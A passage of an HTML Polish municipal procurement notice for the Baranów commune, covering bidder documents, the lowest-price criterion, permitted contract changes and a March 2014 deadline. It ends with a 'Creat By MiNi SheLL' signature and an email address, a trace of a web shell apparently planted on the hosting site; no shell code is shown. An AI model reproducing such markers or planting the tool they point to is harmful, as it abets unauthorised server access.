tych dokumentach. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w III.4.3., zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiedniego kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem - wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Pzp. przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności: 1) siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ o charakterze niezależnym od stron, 2) zmiany obowiązujących przepisów regulujących zasady odbioru i zagospodarowania odpadów, 3) zmiana obowiązującej stawki VAT, 4) zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> gmina@gminabaranow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Baranów, 24-105 Baranów, ul. Rynek 14 - sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2014 godzina 10:00, miejsce: Urząd Gminy Baranów, 24-105 Baranów, ul. Rynek 14 - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com